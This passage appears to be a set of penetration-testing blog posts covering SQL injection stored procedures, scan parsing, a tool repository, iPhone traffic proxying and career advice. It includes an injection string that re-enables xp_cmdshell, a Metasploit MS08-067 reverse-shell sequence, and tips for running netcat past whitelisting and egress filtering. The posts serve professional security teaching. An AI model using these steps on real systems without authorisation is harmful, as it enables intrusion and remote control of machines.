The settings within php.ini are not a fix-all by any means, but they provide security-in-depth for any application using PHP. As a penetration tester, it’s important to be able to tell developers what they’re doing wrong when vulnerabilities are discovered, and to understand how a scripting language such as PHP works at a global level. A huge pet hate of mine is when testers (Nessus, Core Impact or <Insert automated web security scanner> monkeys) report an issue, don’t understand what the issue is, don’t provide a working example and don’t explain the impact specific to the application. Apart from providing a poor service (which the client is probably paying £1000 per day for), this creates the perception that all penetration testers do is ‘run scans’, and it takes a lot of time and conversations with security managers and developers to reverse! Rant over; I hope this is useful as both a learning tool and for reference.
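
If you have shell access to the box in question (or are reviewing a build alongside the client), a quick way to eyeball the directives covered above is something like the following; bear in mind the CLI SAPI can load a different php.ini from the web server, so treat it as a rough check rather than gospel:

php -i | grep -Ei "disable_functions|open_basedir|expose_php|allow_url_fopen|display_errors|safe_mode|register_globals"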

An additional source of information regarding PHP and its directives can be found here: http://ific.uv.es/informatica/manuales/php/.

MS SQL - Useful Stored Procedures for SQL Injection and Ports Info.



The following post lists and describes various useful stored procedures and port information for MS SQL. The information is relevant for all versions unless stated (there may be a couple of mistakes, so corrections are welcome). The information is from many different sources including MS Technet, various books and several people’s brains (mostly mine - such as it is!). Its main use is as a learning tool or reference for performing SQL injection attacks.

Important Stored procedures

sp_columns – Returns column names of tables.
sp_configure – Returns internal database settings; allows you to specify a particular setting and retrieve the value.
sp_dboption – Views or sets user-configurable database options.
sp_who2 and sp_who – Display usernames, the client from which they’re connected, the application used to connect to the database, the command executed on the database and several other pieces of info.


Parameterised Extended stored procedures

xp_cmdshell - The default current directory is %SystemRoot%\System32. This procedure is disabled in SQL 2005 onwards by default, but can be re-enabled remotely by running the following command (either as a straight query or as part of an injection):

;exec sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE

SQLmap (--os-cmd) will do this automatically, but I haven’t had much success with it on real-world tests.
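
For reference, the sort of invocation I mean is along these lines (the URL and parameter are made up; SQLmap will attempt the sp_configure dance above for you before running the command):

sqlmap -u "http://www.example.com/page.asp?id=1" --os-cmd=whoami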

xp_regread – Reads a registry value.
xp_servicecontrol – Stops or starts a Windows service.
xp_terminate_process – Kills a process based on its process ID.

Non-parameterised Extended Stored Procedures

xp_loginconfig – Displays login information, particularly the login mode (mixed etc.) and default login.
xp_logininfo – Shows currently logged in accounts (NTLM accounts).
xp_msver – Lists SQL version and platform info.
xp_enumdsn – Enumerates ODBC data sources.
xp_enumgroups – Enumerates Windows groups.

System Table Objects

Many of the system tables from earlier releases of SQL Server are now implemented as a set of views. These views are known as compatibility views, and they are meant for backward compatibility only. The compatibility views expose the same metadata that was available in SQL Server 2000. However, the compatibility views do not expose any of the metadata related to features that are introduced in SQL Server 2005 and later.

syscolumns (2000) – All column names and stored procedures for the current database.
sysusers – All users who can manipulate the database.
sysfiles – The file and pathname for the current database and its log file.
systypes – Data types defined by SQL or users.


Master DB Tables

sysconfigures – Current DB config settings.
sysdatabases – Lists all DBs on the server.
sysdevices – Enumerates devices used for the DB.
sysxlogins (2000) – Enumerates user info for each permitted user of the database.
sql_logins (2005) – Enumerates user info for each permitted user of the database.
sysremotelogins – Enumerates user info for all users permitted to remotely access the DB.

Ports

The default ports for MS SQL are TCP/1433 and UDP/1434. However the service can be deployed ‘hidden’ on 2433 (this is MS’s idea of hiding!).

UDP 1434 was introduced in SQL 2000 and provides a referral service for multiple instances of SQL running on the same machine. The service listens on this port and returns the IP address and port number of the requested database.
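
One way to sweep for instances (including ones ‘hidden’ off 1433) is to hit the browser service on UDP 1434 with nmap’s ms-sql-info script; a sketch using the example range from earlier posts:

nmap -sU -sS -p U:1434,T:1433,T:2433 --script ms-sql-info 10.10.10.0/24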

Below is a script from MS TechNet showing the ‘fix’ for opening ports on Windows Firewall for MS SQL 2008. This is pretty interesting!

@echo =========  SQL Server Ports  ===================
@echo Enabling SQLServer default instance port 1433
netsh firewall set portopening TCP 1433 "SQLServer"
@echo Enabling Dedicated Admin Connection port 1434
netsh firewall set portopening TCP 1434 "SQL Admin Connection"
@echo Enabling conventional SQL Server Service Broker port 4022 
netsh firewall set portopening TCP 4022 "SQL Service Broker"
@echo Enabling Transact-SQL Debugger/RPC port 135
netsh firewall set portopening TCP 135 "SQL Debugger/RPC"
@echo =========  Analysis Services Ports  ==============
@echo Enabling SSAS Default Instance port 2383
netsh firewall set portopening TCP 2383 "Analysis Services"
@echo Enabling SQL Server Browser Service port 2382
netsh firewall set portopening TCP 2382 "SQL Browser"
@echo =========  Misc Applications  ==============
@echo Enabling HTTP port 80
netsh firewall set portopening TCP 80 "HTTP"
@echo Enabling SSL port 443
netsh firewall set portopening TCP 443 "SSL"
@echo Enabling port for SQL Server Browser Service's 'Browse' Button
netsh firewall set portopening UDP 1434 "SQL Browser"
@echo Allowing multicast broadcast response on UDP (Browser Service Enumerations OK)
netsh firewall set multicastbroadcastresponse ENABLE

It’s also worth bearing these other ports in mind when port scanning or enumerating instances of MS SQL.

We Have the Port Scans, what now?


It's been a while, I hope you're good. I'm fine thanks, busy as sin but isn't that always the way? So where did we leave off? From reading back through my previous post, we'd scanned our little guts out and pulled a list of all ports that were open and all the services that can be interacted with. Boy haven't we been busy! 

It just so happens that now is when the real fun begins. Have a bit of a peruse through the results; not that easy to read, aye? Sure we can quickly find some 135, 445 and have a quick fiddle through the lovely lovely file shares, but where's the automation? This post should cover some basics about gathering even more data from the services we've identified using our ever faithful set of tools such as nikto, gnome-web-photo, curl et al, and keeping the data useable.

First things first, let's bring all of our results together in a more machine readable way. From the previous post we've grabbed all of our nmap output into the three decent formats, plain, greppable and xml. For the purposes of this post we'll be using the xml format and parsing it using xmlstarlet (for those of you that aren't already using starlet, grab a copy, it's a brilliant little command line parser that I can't live without, nessus, nmap, surecheck, anything that dumps xml suddenly becomes friendly to use again!)

The little gem I've been using for a while now is:

cat port_scans/hot-targets.tcp.services.xml | xmlstarlet sel -T -t -m "//state[@state='open']" -m ../../.. -v address/@addr -m hostnames/hostname -i @name -o '  (' -v @name -o ')' -b -b -b -o "," -m .. -v @portid -o ',' -v @protocol -o "," -m service -v @name -i "@tunnel='ssl'" -o 's' -b -o "," -v @product -o ' ' -v @version -v @extrainfo -b -n - | sed 's_^\([^\t ]*\)\( ([^)]*)\)\?\t\([^\t ]*\)_\1.\3\2_' | sort -n -t.

This is a slightly bastardised version of this oneliner brought to you from the lovely folks at redspin. It takes an nmap xml output file (singular in this case) and creates output like this:

10.13.37.10,22,tcp,ssh,OpenSSH 4.3protocol 2.0
10.13.37.10,2301,tcp,http,CompaqHTTPServer *** httpd
10.13.37.10,2381,tcp,http,Apache httpd SSL-only mode
10.13.37.10,3260,tcp,iscsi,
10.13.37.10,5988,tcp,http,Web-Based *** httpd
10.13.37.10,5989,tcp,https,Web-Based *** httpd
10.13.37.11,427,tcp,svrloc,
10.13.37.11,443,tcp,https,VMware ESXi Server httpd
10.13.37.11,5989,tcp,tcpwrapped,
10.13.37.11,8000,tcp,http-alt,
10.13.37.11,8042,tcp,fs-agent,
10.13.37.11,8045,tcp,unknown,
10.13.37.11,80,tcp,http,
10.13.37.11,8100,tcp,tcpwrapped,
10.13.37.11,902,tcp,vmware-auths,VMware Authentication Daemon 1.10

Isn't this a lot more greppable than -oG? Having the data dumped out to csv allows us to rapidly move through and select the exact services we want to interrogate. An example:

root@bt:~# cat output.csv | grep http
10.13.37.10,2301,tcp,http,CompaqHTTPServer *** httpd
10.13.37.10,2381,tcp,http,Apache httpd SSL-only mode
10.13.37.10,5988,tcp,http,Web-Based *** httpd
10.13.37.10,5989,tcp,https,Web-Based *** httpd
10.13.37.11,443,tcp,https,VMware ESXi Server httpd
10.13.37.11,8000,tcp,http-alt,
10.13.37.11,80,tcp,http, 

An even better example:

root@bt:~# cat output.csv | grep http | cut -f 1,2 -d "," | tr "," ":"
10.13.37.10:2301
10.13.37.10:2381
10.13.37.10:5988
10.13.37.10:5989
10.13.37.11:443
10.13.37.11:8000
10.13.37.11:80

An even better example still:

root@bt:~# cat output.csv | grep http | cut -f 1,2 -d "," | tr "," ":" | while read line; do /pentest/web/nikto/nikto.pl -config /pentest/web/nikto/nikto.conf -h $line -output $line.txt; done
....snip....

You get the idea.

While we're on the subject, a nice precursor to nikto is a bit of web scouring. We've all been in the situation before where we've been on an internal test with limited time only to discover 100 webservers spread across the network; it's always a case of best efforts and being left wondering if the ones we missed were the ones that would've bent over. This is where webscour comes in. It's a little script from Geoff over at Cyberis (available here) that, given a list of addresses, grabs screenshots (using gnome-web-photo) and header information from each webserver and produces a handy html file to view them all from. Suddenly all the default content and HP OpenViews can be found quickly and we can move straight onto the Accounting App running Classic ASP on IIS4 that hasn't been in use for 5 years.

Incidentally, this can be run in a similar fashion to the one-liner above:

root@bt:~# cat output.csv | grep http | cut -f 1,2 -d "," | tr "," ":" | ./webscour.pl webservers.htm

As you can imagine there is a lot more we can do with webservers, dirbuster, skipfish the sitekiller and any other forcedbrowse/fuzzer can usually be used in this way, and as always the more data the better.

Next steps as far as web servers are concerned usually involve getting this information into Burp, that way we can play with it properly. Buby is a sensible choice and further down the line we'll look into automated spidering and active scanning from the terminal, replaying nikto/dirbuster output directly into Burp and also utilising the FuzzDB to profile out any CMSs we come across. But that unfortunately will have to wait for another post.

As usual any thoughts, critiques or straight forward calling out either head down to the comments or hit me up on twitter. Hwyl am Nawr!

Final Thoughts

It wouldn't be fair if I weren't to go off topic at least once in a post so here you go....

cat output.csv | grep 161,udp | cut -f 1 -d "," | /pentest/enumeration/snmp/onesixtyone/onesixtyone -c /pentest/enumeration/snmp/onesixtyone/dict.txt -o onesixtyone.out -i -

Have some snmp fun ya'll!

HackArmoury.com - A Pentesticles Project!


Recently, we at Pentesticles took over the ownership and full development of HackArmoury.com. So, I thought it was time to write a blog post about it and speak a bit about what it does, how to use it and what we’re planning for it in the future. We'll be talking a bit about this tonight (12th July 2012) at 11pm UK time (6pm ET) on pauldotcom as well; make sure you don't miss it!

HackArmoury is something I’ve personally been involved in since its creation (by me ol’ mucka @nopslider) and it has proven to be a useful resource for the penetration testing community. Ben and I are now putting a bit of focus on it and continuing its development and maintenance. I've also re-skinned the site since the changeover; I'm still not sure about the Tango-orange colour. It's not a dig at gingers, honest.

So, what is HackArmoury? For those who haven’t used it, it’s essentially a tool repository for Ethical Hacking and Penetration testing. The key advantage is that HackArmoury can be accessed over loads of popular protocols including SVN, TFTP, HTTP, IPv6 and Samba (see below for the full list and instructions) and older versions of tools are maintained. This means that if there are network restrictions on where you’re trying to update from, you have the best chance of being able to connect and get your tools.

Another key feature of the site is that the entire repository of tools is packed into a single ISO, which can be downloaded directly. Each time a new tool is added, the ISO is updated and re-packed meaning that it’s always up-to-date.
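
If you've pulled the ISO down, there's no need to burn it; loop-mounting it somewhere handy works fine (the filename here is a guess, use whatever you downloaded):

mkdir -p /mnt/ha && mount -o loop hackarmoury.iso /mnt/ha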

Our next addition will be Git, as this is an obvious hole. Once we sort the technical aspects and work out the security implications, we'll be ready to go!

We're always looking for trustworthy contributors, so if you fancy helping us tool-up, please drop me an email at lawrence[at]hackarmoury.com or through the comments on this blog. In the meantime, I hope you enjoy using the site and it proves useful.

How can I connect? There are lots of ways to connect up, you can do this via the following methods:


IPv6

IPv6 is now supported by HackArmoury (2a02:af8:1000:8c::2f98:4ed7). If you want to access us directly over IPv6, and you can't remember a 128-bit address, use the hostname ipv6.hackarmoury.com. All of our common protocols will be supported.


Samba

You can access all your tools straight over Samba using \\hackarmoury.com\tools\. No authentication required, just start->run->\\hackarmoury.com\tools\ and you're away.

For example, to run nc.exe, simply type \\hackarmoury.com\tools\all_binaries\nc.exe. If running on a Windows host with executable blacklisting or whitelisting, it's always worth testing over Samba too. In many cases this execution method is permitted without consideration for the consequences.

HTTP

Everything in the toolkit is browseable over HTTP and HTTPS. Navigate directly to http://hackarmoury.com/tools and you're away.


Rsync

To minimise download bandwidth, you can keep up-to-date with our tool set over Rsync. Use the following command to download after reading our licensing terms here:

rsync -avz rsync://hackarmoury.com/tools /ha

As with all other protocols, no authentication is required to download.


SVN

You can keep an offline copy of the armoury simply by doing a Subversion checkout. If you're regularly running the tools, it makes much more sense to keep an offline copy for speed and portability. It’s a much more efficient way of keeping up-to-date with new tools, as you don't need to be scouting around the site or downloading large ISO images.

Simply type:

svn co svn://hackarmoury.com/live /ha

To update, navigate to your local directory and perform:

svn update


TFTP

Executable files only are available over TFTP due to the lack of a directory structure, and you must know the name of the file in advance.

You can download files like this:

tftp -i hackarmoury.com get nc.exe

You may find this useful in some poorly implemented egress filtering scenarios.
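
The command above uses the Windows tftp client syntax (-i sets binary image mode). If you're pulling from a Linux box instead, curl can usually speak TFTP too, assuming your curl build includes TFTP support:

curl -o nc.exe tftp://hackarmoury.com/nc.exe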

PaulDotCom Interview

A big thanks to Paul, Mike and Larry (and Carlos) for having us on the show, we really enjoyed it. Apologies for being a bit up-tight in places, but we're British, it's what we do. And, for the record, I like Nessus really (printers don't) and SANS rock (apart from their examination style).

You can check out the video of us chatting shite here: http://pauldotcom.com/2012/07/pentesticles-penetration-testi.html I'll be emailing Paul with some better 'your Network's shite' comments in the London vernacular! PENTESTICLES AWAY!!!!

Proxying 3G iPhone Data



Hey! It's been a while. I promised you guys that I'd do this more often and I've failed you, and for that I am sorry (well, sort of). So today I'm taking a break from automation to talk to you lovely folks about something I've been working on lately: proxying. Not just proxying, but proxying iPhone apps. No wait, not just proxying iPhone apps, but proxying iPhone apps' traffic over 3G. Is there a setting for that? No! (At least there isn't in iOS 5; iOS 6 has one, but only through the Configuration Utility.)

It was a pain in the ass, but it is possible, with caveats. Firstly, the iPhone has to be jailbroken; secondly, you need to edit some config files. If you're cool with that, read on.

Step 1

Jailbreak your phone.

Step 2

Edit the /private/var/preferences/SystemConfiguration/preferences.plist file.

Locate the "ip1" section:

<dict>
  <key>Interface</key>
  <dict>
    <key>DeviceName</key>
    <string>ip1</string>
    <key>Hardware</key>
    <string>com.apple.CommCenter</string>
    <key>Type</key>
    <string>com.apple.CommCenter</string>
  </dict>

Then add the following section immediately afterwards (still inside the same outer dict, after the Interface block):

  <key>Proxies</key>
  <dict>
    <key>ProxyAutoConfigEnable</key>
    <integer>1</integer>
    <key>ProxyAutoConfigURLString</key>
    <string>file:///private/var/preferences/proxy.pac</string>
  </dict>

Step 3

Create the following file: /private/var/preferences/proxy.pac

and add the following:

function FindProxyForURL(url, host)
{
    return "PROXY YOUR_EXTERNAL_IP:8080";
}
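
If you'd rather not push every bit of the phone's traffic through your proxy (which can make normal use painful over 3G), a slightly more selective PAC file is one option. This is only a sketch: api.example.com is a placeholder for whichever host the target app actually talks to.

function FindProxyForURL(url, host)
{
    // hypothetical target host - replace with the app's real API host
    if (dnsDomainIs(host, "api.example.com"))
        return "PROXY YOUR_EXTERNAL_IP:8080";
    // everything else bypasses the proxy
    return "DIRECT";
}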

Note: as this is over the 3G network, your proxy needs to be reachable from the internet. If you're planning on using Burp, I'd probably use a netcat tunnel so you can run your proxy on a box you have on EC2; alternatively, just open up a port on your home router and use that.
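
As a sketch of one way to do the tunnelling (an SSH remote forward rather than the netcat relay mentioned above, assuming you have SSH access to an internet-facing box and Burp listening locally on 8080):

# run from the machine where Burp is listening on 127.0.0.1:8080;
# the remote box then accepts connections on 8080 and relays them back down the tunnel
# (the remote sshd needs GatewayPorts yes to bind on all interfaces)
ssh -N -R 0.0.0.0:8080:127.0.0.1:8080 user@your-ec2-host

YOUR_EXTERNAL_IP in the PAC file would then be the EC2 box's public address.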

Step 4

Fire up your proxy and restart your phone; it doesn't get much simpler than that.

Step X

Something I've been doing to make app testing a bit easier is using Veency, a VNC tool (available on Cydia) for your iPhone that lets you interact with it from your PC. It makes life a lot easier when you have full use of your keyboard and mouse on the phone.

Proxying 3G traffic actually yielded some interesting results: certain apps that weren't even active authenticated (over plain text) with their servers on phone boot. I won't give away who here, but they have been notified that this is bad.

Hope that was somewhat useful, it was for me anyway, until next time, come say hello @bdpuk.

Byeeeeeeeeeeee.

De-duping multiple-interface Nessus results with sed

A bit of a mouthful and not that useful for most, but this is saving me headaches left, right and centre at the moment (and is dead simple).

It's always an issue when testing a network that you can run into the same box multiple times under different addresses; this became all too apparent to me recently when I was testing 4 boxes with over 20 interfaces between them, serving up different services. When it comes to reporting, the customer isn't going to want to hear about the same issues on the same ports on the same box multiple times, but manually separating this lot out of Nessus is a nightmare... sed to the rescue.

Let's assume that you have your Nessus output in some useful parseable format (xmlstarlet, anyone?).
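
As an aside, if what you have is a .nessus (v2) XML export, something along these lines should spit out host:port pairs to feed into the sed step below (just a sketch; scan.nessus is a placeholder filename):

xmlstarlet sel -t -m '//ReportHost/ReportItem' -v '../@name' -o ':' -v '@port' -n scan.nessus | sort -u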

Let's also assume that you have a list of IPs that match up to each hostname. First things first, create an ip2host.sed file and fill it with your replace statements (escaping the dots so they match literally), e.g.:

s/192\.168\.0\.1/host1/g
s/192\.168\.0\.2/host1/g
s/192\.168\.0\.3/host1/g
s/192\.168\.0\.4/host1/g
s/192\.168\.0\.5/host2/g
s/192\.168\.0\.6/host2/g
s/192\.168\.0\.7/host3/g
s/192\.168\.0\.8/host3/g

The next step is nice and simple; either:

sed -f ip2host.sed << EOF | sort | uniq

and copy and paste your results into the terminal, ending with EOF, or...

sed -f ip2host.sed < fileofservices.txt | sort | uniq

if you've already saved the file. This will take:

192.168.0.1:443
192.168.0.2:443
192.168.0.3:443
192.168.0.5:25
etc

and convert it to:

host1:443
host2:25
etc.

Not a complicated one today, but always a handy one to remember.

Ben





What You Need To Know to Become a Penetration Tester

It really has been a long time since I last posted. This post is more of an essay, so it may be a TL;DR for some, but hopefully there is some good information for those who wish to break into Penetration testing, or at the very least something I can point people to next time I'm asked.

As I’m sure is the experience of other Penetration Testers, I’m often asked (or see slapped across LinkedIn Forums) by a whole range of people “How do I break into Penetration testing?” or the like. The prospect of becoming a ‘professional hacker’ is all too enticing for graduates, IT professionals and even Information Security bods in other functional areas alike. Having answered this question and posed many a question in rebuttal, I decided to formalise my experiences, musings and advice into a single blog post. I hope it helps.

What is Penetration Testing?

To begin with, it’s always worth checking your understanding of what a Penetration tester actually is, does and some of the attributes belonging to the ‘good and great ones’. Being a Penetration tester is not the same as being (what the media often portray as) a hacker. To dispel a couple of myths about Penetration testing, it’s worth describing some of the aspects of the job in bullet points for brevity.
  • For most of the industry, a Penetration test does not involve development of 0-day exploits.
  • Normally, you get a very limited amount of time (days) to compromise systems that real attackers would have months to work on.
  • You always have to document your findings in a written report at the end of the test. Often, you will be asked to explain in detail some or all the findings to technical and non-technical audiences.
  • In a lot of cases, clients aren’t looking for a single route to domain admin. They’re interested in their broader attack surface and coverage across their whole estate. 
  • Business considerations, such as loss of earnings due to downtime and the cost of the engagement, are much more important than you may initially think (and probably not something you'd consider at all before testing).

What makes a good tester?

I believe that there are quite a few considerations beyond raw technical knowledge that make a good tester. It's key to remember again that Penetration testing is not 'hacking' and although there is a place for the borderline-autistic who hacks the Pentagon on their neighbours' wireless, it's more likely they'll be suited to research or the Russian mafia. Again, I've added a bullet-pointed list describing what I consider the key attributes of good and great testers, which I look for when hiring inexperienced testers.

  • The right attitude – This is much more important than someone who's done a course (CEH or the like). The truth is, I don't believe that you can be a good Penetration tester if you're not passionate about IT Security and, moreover, technology. It does need to be more than a job, as the up-skilling and constant personal development are not possible to maintain if your heart's not in it. Also, you need to be fairly autodidactic (into self-learning) as even now there are few good core texts on most topics and they become outdated quickly. Most experienced testers will have gone through a huge amount of self-learning and will be resentful if you expect it on a plate (others just plain don't want to share).
  • Good fundamentals – The best testers know a lot about a few things, but something about everything else. Despite some academiphobia (is that a word?) within the industry, I think that an IT-related degree provides a great grounding in computer science and will stand you in good stead. Similarly, experienced sysadmins, network architects and developers should have good foundations on which to build. It's common to find testers with big knowledge gaps; it's really important to understand all areas of enterprise infrastructure to some degree in order to progress through the ranks.
  • Technical Prowess – At its core, Penetration testing is an extremely technical discipline. Not only do you need to understand how things work at a low level, you also need to subvert controls in a repeatable way and learn constantly as new versions of software and hardware are released. The ability to code or script is always an advantage, even if you're limited to simple bash scripting. However, some of the best testers I know can't write code but can read and break very well indeed. That said, not being able to will ultimately limit your vision and scope. More on this later!
  • Soft and Written skills – Often overlooked, these skills are what separate Penetration testers from hackers and script kiddies. Ask yourself: as a client, would you accept the work of someone who cannot write a coherent sentence or express simple issues in plain English, and pay over £1,000 per day for the pleasure? The key deliverable for the client is the written report. Penetration testing companies require consultants who can read, write and speak English well. Unless you're a total genius who's finding 0-days nobody else can, they're unlikely to overlook total ineptitude in this area.

Where to Start

In general, I would say that it’s almost impossible to get into a Penetration testing job at any level if you lack any exposure to computer science or hacking. It’s not like sales where you can start at the bottom with nothing and there are thousands of jobs.  
From my experience, there are four common starting points that lead people to the Penetration testing path. Apologies if this doesn’t fit your circumstances or I’ve left out anything that’s obvious.
  1. A school or college leaver who hacks as a hobby.
  2. An existing IT professional (e.g. Sys admin, Developer, Network Engineer)
  3. A recent graduate of Computer Science, Cyber Security or Ethical Hacking
  4. A graduate or experienced professional in another field

Scenario 1

In Penetration testing, a lack of schooling and higher or further education isn't necessarily a hindrance if you have some skill. However, you will likely need to prove this to a greater extent than perhaps a graduate would. Bug bounties are a great way to prove your prowess, with sites such as Bugcrowd paying sizeable winnings to the best bug hunters. If this is beyond your current skill level, it's worth playing with some of the teaching frameworks such as Metasploit Unleashed or DVWA to hone your skills. It's worth remembering that companies pay large amounts of money to recruiters, so if you approach them directly with a well-written CV, they're likely to appreciate your enterprising spirit as well as the potential cost savings! If your CV is short or particularly unimpressive, you should pay particular attention to writing a covering letter or email. This should be well constructed and demonstrate your keenness to work for that company specifically (everyone likes a bit of mild flattery), along with a bit about your background and aspirations. It's worth noting that most organisations (mine included) will throw out emails or CVs that are poorly written or full of mistakes at first sift. If you're not grammatically gifted, ask someone who is to assist.

Scenario 2

Existing IT professionals already (potentially) have quite a bit of skill in a useful area. This is often quite attractive for Penetration testing companies, as such candidates understand general working practices and professionalism (one would hope!) and are often very keen. My advice would be to avoid expensive courses and retraining in order to land a job, and to focus on moving into a role as quickly as possible. There are plenty of cheap or free resources online to gain some basic knowledge around testing and get to a level where you can hold a decent conversation in an interview or demonstrate working knowledge of Metasploit or Burp Suite on a rig. I always believe that attitude is more important than current skill level with inexperienced hires, and spending £3k on a SANS course won't make you start any higher in an organisation without testing experience. Great resources for this type of up-skilling can be found on sites like SecurityTube, Udemy, OWASP (or just YouTube), and courses like Metasploit Unleashed and Mutillidae will help you reach your initial goals.

Scenario 3

As a recent graduate, you have likely been exposed to good basics across a wide breadth of IT; some of it you may even remember. For those of you who have done a Computer Science degree and particularly enjoyed a security module or completed a Security or hacking related dissertation, you may feel the next step is to apply for a Penetration testing job. In this scenario, my advice would be to make totally sure it’s what you want to do and commit. As an interviewer, I’m always looking for a passion for security and some evidence of learning outside of University in this field, or as a minimum, a good security-focused FYP. If you’re lacking this, it will likely seem as though you don’t know what you want to do and you saw a couple of jobs being advertised for senior Penetration testers for up to £100k. For the people who’ve done a Security-related degree (or Masters) at Universities such as Abertay, Glamorgan, Kingston, Royal Holloway etc. you’re likely to get to the interview stage based on the specificity of your experience (as long as you got a reasonable grade).

Scenario 4

If you’ve no experience or qualifications in the field, then it’s likely to be a struggle to get an interview on the strength of your CV alone. I would advise the same approach as a School or College leaver, get ethically hacking and learning! An impassioned covering letter and interest in being an unpaid intern will often turn the heads of a hiring manager.

Industry Accreditation

This is probably the most frequent area of questioning I get when people ask me about moving into the industry. As the industry is so heavily focused on the CESG CHECK scheme, it's best to separate the discussion into two parts: the CHECK scheme and other qualifications.

The CHECK scheme was initially set up in response to the increased demand for skilled Penetration testing to be performed against HMG (Her Majesty's Government) assets and CNI (Critical National Infrastructure) in the form of ITHCs (IT Health Checks). In short, the Government didn't have the funding to hire enough heads internally to complete all the work at the right level (or the salaries to tempt good testers away from industry). Therefore, the CHECK scheme was created as a framework to manage the subcontracting of this extra effort. A large number of Penetration testing firms rely heavily on work from the CHECK scheme and it remains a huge source of income. Both companies and individuals can accredit to the scheme, with approved organisations deemed 'Green Light' should they satisfy the required criteria.

The accreditation of individuals is quite complex, and even experienced testers sometimes get confused by the different options. There are essentially two grades of Penetration tester within the scheme, CTL (CHECK Team Leader) and CTM (CHECK Team Member), with the former being the top tier. In order to achieve either of these levels, the individual must pass an exam, hold SC clearance and work for a CHECK Green Light company. SC clearance can be attained by UK and foreign nationals resident within the UK. However, if you're not a British citizen your clearance will often be caveated with 'UK eyes only', which will stop you from doing certain types of work. At the time of writing, the following table shows the possible examination paths to accreditation.

CHECK Team Leader
  • CHECK Team Leader (Infrastructure)
      • CREST Infrastructure Certification Examination (www.crest-approved.org)
      • Tiger Scheme Senior Security Tester (www.tigerscheme.org)
      • Cyber Scheme Team Leader Examination (www.thecyberscheme.co.uk)
  • CHECK Team Leader (Web applications)
      • CREST Certified Web Application Tester (www.crest-approved.org)
      • Tiger Scheme Web Application Tester (www.tigerscheme.org)

CHECK Team Member
  • CHECK Team Member
      • CREST Registered Tester Examination (www.crest-approved.org)
      • Tiger Scheme Qualified Security Tester Examination (www.tigerscheme.org)
      • Cyber Scheme Team Member Examination (www.thecyberscheme.co.uk)

Fig.1 - Taken from the CESG website

The main difference between a CTL and a CTM (apart from the difficulty of the exams) is that a CTL must author the report and lead the testing; a CTM cannot work solo on a CHECK test. Therefore, a CTL is more valuable to a company that performs CHECK work, as they can work alone, which makes scheduling easier and means the tester is likely to be more highly utilised. The CTL grade subdivides into Web Applications and Infrastructure; however, there is currently no restriction on what type of work a CTL can perform either on their own or with other testers (i.e. a Web Application CTL can perform Infrastructure work solo).

Most testers will aspire to pass these exams, certainly when working within a CHECK Green light organisation, as their employer will either mandate or encourage it. The CTL exams are all-day and quite challenging, even for experienced testers. More information on the specifics of the exams can be found on the sites listed in the table above.

Other Industry Accreditations

There are loads of courses and accreditations out there; I have just listed a few of the common ones and given a few lines on each, along with my opinions, in order to give a flavour.

CEH – The general consensus of testers in my experience is that CEH lacks technical detail and isn't really a very good qualification for a Penetration Tester. However, I have not completed this exam myself and base my opinions on the experiences of trusted colleagues and the course syllabus and examination guides. I wouldn't recommend this certification if you wish to be a Penetration tester.

OSCP / PWK by Offensive Security – This is a pretty technical course, which many of my team and colleagues have done. The course uses Kali Linux as a base operating system and runs you through a challenging series of labs exploring scripting in bash and Python, the basics of exploit development and loads more. It's online and gives you VPN access to the various labs required for the course. In order to gain the OSCP qualification, you are required to submit coursework from the labs and complete a challenging 24-hour exam. Feedback on this has always been that it's awesome and very challenging.

SANS Courses – Again, I have never been on a SANS course, but I have seen a lot of the material (having put some of my team through these), know a few instructors and have heard good things across the board. My one criticism is that most of the exams are multiple choice rather than practical, which is a bit disappointing. That said, the instructors of the on-site courses are always excellent and if you can keep up you'll learn a lot. I believe that in the US it is more of a standard to go after the GWAPT or GPEN exams.

BEWARE recruiters

I decided not to do a section on CVs, as I felt it was a bit patronising. Suffice to say, don't send your CV across with any mistakes (spelling, grammar or otherwise), don't leave any unexplained gaps and don't include huge sections on your non-security-related hobbies.

I suppose that finding a job often starts with recruiters, or at least LinkedIn. I have a hard time working out which is which nowadays, but it's where I shall begin. For a lot of companies, recruiters are a necessary evil, but it's best to avoid going through one unless it's a necessity (some larger companies may mandate this route).

I have literally hundreds of horror stories about recruiters in Penetration testing, which I won't bore you with, but be wary of sending them your CV (and, moreover, of them getting hold of your CV, sending it to loads of companies and then ringing you to see if you're interested in any that bite). I would advise that you take their advice with a pinch of salt, as most don't understand the market. You can waste a lot of time being sent to far-flung places for inappropriate jobs that a recruiter persuaded you were a good idea (in order to make their quota of candidates to interviews). If you're unsure, don't be afraid to ask to speak to the company on the phone first to clarify that the role is suitable.

I would advise that you approach reputable companies directly, you can find a list of CHECK Green light companies here for reference. 

If you’re following my advice and taking a direct approach, I would always advise that you check the company website first to see if they mention hiring on there. As I mentioned earlier, most organisations will see it as a positive thing if you track down the right person (or at least an appropriate one) on LinkedIn, send them a bespoke email introducing yourself and asking them about hiring and if they’d consider you for an interview. This saves them money, and shows a bit of initiative on your part.

The Interview Process

Most interviews I’ve done (as an interviewee and interviewer) for testing roles have all followed a fairly formulaic approach. They usually follow a two or three stage process with a mix of the following aspects:
  • Phone-based – Some simple technical questions (Nmap flags, Port numbers, What’s a XSS? etc.) and to check you speak good English and have a brain.
  • Face-to-face (Technical) – This is normally a series of technical questions and a technical assessment on a rig of some kind, often with you explaining what you're doing as you go, or with the interviewer(s) watching your actions on another screen. This can be very intimidating, as they tend to bring in very senior technical people to watch. Normally this will be pretty basic, like popping a box with MSF (using MS08-067) or basic XSS (see the sketch after this list).
  • Face-to-face (Presenting / meet-the-director) – You may be asked to present a Penetration test report or prepare something to assess your interpersonal skills. Depending on the company, you may need to meet a higher level business representative such as a director or partner.
  • Face-to-face (General) – A general interview will have a mix of discovery questions, often using HR methodologies such as the STAR model. This type of interview will seek to find out a bit more about you as a person and your aspirations to check for a cultural fit.
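
For context, 'popping a box with MSF' on an interview rig rarely means more than something like the following (a hedged sketch; the addresses are placeholders and module options may vary slightly between Metasploit versions):

msfconsole
use exploit/windows/smb/ms08_067_netapi
set RHOST 192.168.1.10
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.5
exploit

If that lands you a Meterpreter session and you can explain clearly what just happened and why, you're most of the way there.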

